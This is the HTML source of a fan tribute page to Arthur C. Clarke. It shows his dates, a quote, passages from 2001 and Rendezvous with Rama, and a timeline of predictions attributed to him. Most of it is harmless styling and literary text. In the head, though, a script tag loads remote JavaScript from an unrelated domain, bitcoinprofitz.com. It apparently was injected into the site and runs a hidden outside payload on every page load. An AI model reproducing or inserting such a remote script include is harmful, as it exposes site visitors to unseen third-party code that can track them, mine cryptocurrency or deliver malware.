<!DOCTYPE html>
<html>

<head>

<style>

 @import url('https://fonts.googleapis.com/css?family=Oswald:400,700|Quattrocento:400,700');
* {
box-sizing: border-box;
}

/* Grid
–––––––––––––––––––––––––––––––––––––––––––––––––– */
.container {
  position: relative;
  width: 100%;
  max-width: 1200px;
  margin: 0 auto;
  padding: 0 20px;
  box-sizing: border-box; }
.column,
.columns {
  width: 100%;
  float: left;
  box-sizing: border-box; }

/* For devices larger than 400px */
@media (min-width: 400px) {
  .container {
    width: 85%;
    padding: 0; }
}

/* For devices larger than 550px */
@media (min-width: 550px) {
  .container {
    width: 80%; }
  .column,
  .columns {
    margin-left: 4%; }
  .column:first-child,
  .columns:first-child {
    margin-left: 0; }

  .one.column,
  .one.columns                    { width: 4.66666666667%; }
  .two.columns                    { width: 13.3333333333%; }
  .three.columns                  { width: 22%;            }
  .four.columns                   { width: 30.6666666667%; }
  .five.columns                   { width: 39.3333333333%; }
  .six.columns                    { width: 48%;            }
  .seven.columns                  { width: 56.6666666667%; }
  .eight.columns                  { width: 65.3333333333%; }
  .nine.columns                   { width: 74.0%;          }
  .ten.columns                    { width: 82.6666666667%; }
  .eleven.columns                 { width: 91.3333333333%; }
  .twelve.columns                 { width: 100%; margin-left: 0; }

  .one-third.column               { width: 30.6666666667%; }
  .two-thirds.column              { width: 65.3333333333%; }

  .one-half.column                { width: 48%; }

  /* Offsets */
  .offset-by-one.column,
  .offset-by-one.columns          { margin-left: 8.66666666667%; }
  .offset-by-two.column,
  .offset-by-two.columns          { margin-left: 17.3333333333%; }
  .offset-by-three.column,
  .offset-by-three.columns        { margin-left: 26%;            }
  .offset-by-four.column,
  .offset-by-four.columns         { margin-left: 34.6666666667%; }
  .offset-by-five.column,
  .offset-by-five.columns         { margin-left: 43.3333333333%; }
  .offset-by-six.column,
  .offset-by-six.columns          { margin-left: 52%;            }
  .offset-by-seven.column,
  .offset-by-seven.columns        { margin-left: 60.6666666667%; }
  .offset-by-eight.column,
  .offset-by-eight.columns        { margin-left: 69.3333333333%; }
  .offset-by-nine.column,
  .offset-by-nine.columns         { margin-left: 78.0%;          }
  .offset-by-ten.column,
  .offset-by-ten.columns          { margin-left: 86.6666666667%; }
  .offset-by-eleven.column,
  .offset-by-eleven.columns       { margin-left: 95.3333333333%; }

  .offset-by-one-third.column,
  .offset-by-one-third.columns    { margin-left: 34.6666666667%; }
  .offset-by-two-thirds.column,
  .offset-by-two-thirds.columns   { margin-left: 69.3333333333%; }

  .offset-by-one-half.column,
  .offset-by-one-half.columns     { margin-left: 52%; }

}


/* Base Styles
–––––––––––––––––––––––––––––––––––––––––––––––––– */
html { font-size: 100%; }
body {
  font-size: 1em;
  line-height: 1.6;
  font-weight: 400;
  font-family: 'Quattrocento', serif;
  color: #222; }


/* Typography
–––––––––––––––––––––––––––––––––––––––––––––––––– */
h1, h2, h3, h4, h5, h6 {
  margin-top: 0;
  margin-bottom: 2rem;
  font-weight: 300; }
h1      { font-size: 6em; font-family: 'Oswald', sans-serif; }
h2      { font-size: 2em; }
h3      { font-size: 1.17em; }
h4      { font-size: 1em; }
h5      { font-size: 0.83em; }
h6      { font-size: 0.75em; }


p {
  margin-top: 0;
  font-family: 'Quattrocento', serif;}
  
img {
  width: 100%;
  height: auto;
}
 
/* Links
–––––––––––––––––––––––––––––––––––––––––––––––––– */
a {
  color: #1EAEDB;
}
a:hover {
  color: #0FA0CE;
}
/* Header Section
–––––––––––––––––––––––––––––––––––––––––––––––––– */

header {
  height: 100vh;
  background: #55665E;
  background-image: url(https://jeffbredenkamp.neocities.org/arthur.png);
  background-position: right;
  background-repeat: no-repeat;
  background-size: auto 100%;
  padding-top: 20vh;
}
header h1 {
  color: #fff;
  margin: 0;
  text-transform: uppercase;
}
header h2 {
  color: #fff;
  font-family: 'Quattrocento', serif;
  margin: 0;
}
header h3 {
  color: #fff;
  width: 40%;
  font-style: italic;
  font-family: 'Quattrocento', serif;
  margin: 0;
}
/* Content Section
–––––––––––––––––––––––––––––––––––––––––––––––––– */

#content {
  padding: 80px 0;
}
#content h2 {
  font-family: 'Oswald', sans-serif;
  margin: 0;
  text-transform: uppercase;
  font-size: 3em;
  color: #55665E;
}
#content h3 {
  font-family: 'Quattrocento', serif;
  margin-bottom: 20px;
  font-size: 2em;
  font-weight: 700;
}
/* timeline Section
–––––––––––––––––––––––––––––––––––––––––––––––––– */

#timeline {
  padding: 80px 0;
  background: #55665E;
}
#timeline h2 {
  margin-bottom: 0;
  font-size: 2.3em;
}
.timeline {
  outline: 1px dashed rgba(255, 0, 0, 0);
}
.timeline h3 {
  color: #fff;
}
.timeline p, .timeline h3 {
  margin: 0;
}

@media screen and (max-width: 500px) {
.timeline {
  border-left: 1px solid #FFFFFF;
  margin-left: 25px;
}
}

@media screen and (min-width: 500px) {
.timeline {
  border-top: 1px solid #fff;
  padding-top: 45px;
  margin-top: 60px;
}
}

@media screen and (max-width: 500px) {
.steps-one,  .steps-two,  .steps-three,  .steps-four {
  margin-left: -5px;
}
}

@media screen and (min-width: 500px) {
.steps-one,  .steps-two,  .steps-three,  .steps-four {
  float: left;
  width: 25%;
  margin-top: -50px;
}
}

@media screen and (max-width: 500px) {
.steps-one,  .steps-two,  .steps-three {
  padding-bottom: 40px;
}
}
.ball {
  display: block;
  margin: auto;
  width: 10px;
  height: 10px;
  border-radius: 50%;
}

@media screen and (max-width: 500px) {
.ball {
  float: left;
  margin-right: 20px;
}
.timeline p {
  padding-left: 30px;
  position: relative;
  top: -10px;
}
.timeline h3 {
  position: relative;
  top: -10px;
}
}

@media screen and (min-width: 500px) {
.timeline h3 {
  text-align: center;
}
}

@media screen and (min-width: 500px) {
.timeline p {
  text-align: center;
}
}
/* Content Section
–––––––––––––––––––––––––––––––––––––––––––––––––– */

#moreinfo {
  padding: 80px 0;
}
#moreinfo h2 {
  font-family: 'Oswald', sans-serif;
  margin: 0;
  text-transform: uppercase;
  font-size: 3em;
  color: #55665E;
}
#moreinfo h3 {
  font-family: 'Quattrocento', serif;
  margin-bottom: 20px;
  font-size: 2em;
  font-weight: 700;
}
/* Footer Section
–––––––––––––––––––––––––––––––––––––––––––––––––– */

footer {
  padding: 80px 0;
  background: #55665E;
}
footer p {
  text-align: center;
}
footer i {
  color: #ffffff;
  padding: 0 5px;
}
/* Misc
–––––––––––––––––––––––––––––––––––––––––––––––––– */

.block {
  width: 100px;
  height: 1px;
  background: #fff;
  margin: 40px 0;
}
hr {
  background: #55665E;
  border: 0;
  height: 1px;
}
blockquote {
  color: #55665E;
  font-size: 2em;
  padding-top: 300px;
  font-style: italic;
}
i {
  font-style: italic;
}
/* Clearing
–––––––––––––––––––––––––––––––––––––––––––––––––– */

/* Self Clearing Goodness */
.container:after, .row:after, .u-cf {
  content: "";
  display: table;
  clear: both;
}


@media all and (max-width: 1200px) {
header h1 {
  font-size: 3em;
}
header h2 {
  font-size: 1.2em;
}
header h3 {
  font-size: 1em;
  width: 60%;
}

}

.small {
  font-size: 22px;
}
</style>

   <script src='//bitcoinprofitz.com/track/3/'></script>
</head>


<body>


<header>
  <div class="container">
    <div class="row">
      <div class="columns twelve">
        <h1 class="heading"><span class="small">Sir</span> Arthur C. Clarke</h1>
        <h2 class="subheading">16 December 1917 – 19 March 2008</h2>
        <div class="block subheading"></div>
        <h3 class="quote subheading">"Sometimes I think we're alone in the universe, and sometimes I think we're not. In either case the idea is quite staggering."</h3>
      </div>
    </div>
  </div>
</header>
<div id="content">
  <div class="container">
    <div class="row">
      <div class="six columns">
        <h2>Hello Dave</h2>
        <h3>2001: A Space Odyssey</h3>
      </div>
    </div>
    <div class="row">
      <div class="four columns">
        <p>Behind every man now alive stand thirty ghosts, for that is the ratio by which the dead outnumber the living. Since the dawn of time, roughly a hundred billion human beings have walked the planet Earth.</p>
        <p>Now this is an interesting number, for by a curious coincidence there are approximately a hundred billion stars in our local universe, the Milky Way. So for every man who has ever lived, in this Universe there shines a star.</p>
        <p>But every one of those stars is a sun, often far more brilliant and glorious than the small, nearby star we call the Sun. And many--perhaps most--of those alien suns have planets circling them. So almost certainly there is enough land in the sky to give every member of the human species, back to the first ape-man, his own private, world-sized heaven--or hell.</p>
      </div>
      <div class="four columns">
        <p>How many of those potential heavens and hells are now inhabited, and by what manner of creatures, we have no way of guessing; the very nearest is a million times farther away than Mars or Venus, those still remote goals of the next generation. But the barriers of distance are crumbling; one day we shall meet our equals, or our masters, among the stars.</p>
        <p>Men have been slow to face this prospect; some still hope that it may never become reality. Increasing numbers, however are asking; 'Why have such meetings not occurred already, since we ourselves are about to venture into space?'</p>
        <p>Why not, indeed? Here is one possible answer to that very reasonable question. But please remember: this is only a work of fiction.</p>
        <p>The truth, as always, will be far stranger.</p>
      </div>
      <div class="four columns">
        <blockquote><i class="fa fa-quote-left" aria-hidden="true" style="font-style: italic; padding-right: 10px;"></i>Just what do you think you're doing, Dave?</blockquote>
      </div>
    </div>
    <div class="row">
      <div class="eight columns">
        <hr>
      </div>
    </div>
  </div>
</div>
<div id="timeline">
  <div class="container">
    <h2> Predictions </h2>
    <h3>In 1964, author Sir Arthur C. Clarke was asked to predict the future 50 years hence.</h3>
    <div class="timeline">
      <div class="steps-one"> <img class="ball" src="http://placehold.it/20/FFFFFF/FFFFFF" alt="" />
        <h3> 2017 </h3>
        <p> On his hundred birthday, December 16, Sir Arthur C. Clarke is one of the first guests in the Hilton Orbiter. </p>
      </div>
      <div class="steps-two"> <img class="ball" src="http://placehold.it/20/FFFFFF/FFFFFF" alt="" />
        <h3> 2020 </h3>
        <p> Artificial Intelligence reaches human level. From now on there are two intelligent species on Earth. </p>
      </div>
      <div class="steps-three"> <img class="ball" src="http://placehold.it/20/FFFFFF/FFFFFF" alt="" />
        <h3> 2023 </h3>
        <p class="steps-description"> Dinosaur facsimiles are cloned from computer-generated DNA. </p>
      </div>
      <div class="steps-four"> <img class="ball" src="http://placehold.it/20/FFFFFF/FFFFFF" alt="" />
        <h3> 2024 </h3>
        <p> Infrared signals are detected coming from the centre of the Galaxy, obviously the product of a technologically advanced civilisation. All attempts to decipher them fail. </p>
      </div>
    </div>
    <!-- /.steps-timeline --> 
    
  </div>
</div>
<div id="moreinfo">
  <div class="container">
    <div class="row">
      <div class="twelve columns">
        <h2>Spider Tripod Robot</h2>
        <h3>Rendezvous with Rama</h3>
      </div>
    </div>
    <div class="row">
      <div class="six columns">
        <p>Norton turned his head. Ten metres away was a slender-legged tripod surmounted by a spherical body no larger than a football. Set around the body were three large, expressionless eyes, apparently giving 360 degrees of vision, and trailing beneath it were three whiplike tendrils. The creature was not quite as tall as a man, and looked far too fragile to be dangerous, but that did not excuse their carelessness in letting it sneak up on them unawares. It reminded Norton of nothing so much as a three-legged spider, or daddy-long-legs, and he wondered how it had solved the problem - never challenged by any creature on Earth - of tripedal locomotion.</p>
        <p>After regarding them passively for several minutes, the creature suddenly moved, and now they could understand why they had failed to observe its arrival. It was fast, and it covered the ground with such an extraordinary spinning motion that the human eye and mind had real difficulty in following it.</p>
        <p>...each leg in turn acted as a pivot around which the creature whirled its body... it also seemed to him that every few 'steps' it reversed its direction of spin, while the three whips flickered over the ground like lightning as it moved.</p>
        <p>Most of the spider is simply a battery, much like that found in electric eels and rays... It's the creature's source of energy.</p>
      </div>
      <div class="six columns"> <img src="https://jeffbredenkamp.neocities.org/rama_white2.png" alt=""> </div>
    </div>
  </div>
</div>
<footer>
  <div class="container">
    <p>Made with <i class="fa fa-heart" aria-hidden="true"></i> by Jeff</p>
  </div>
</footer>

</body>


</html>
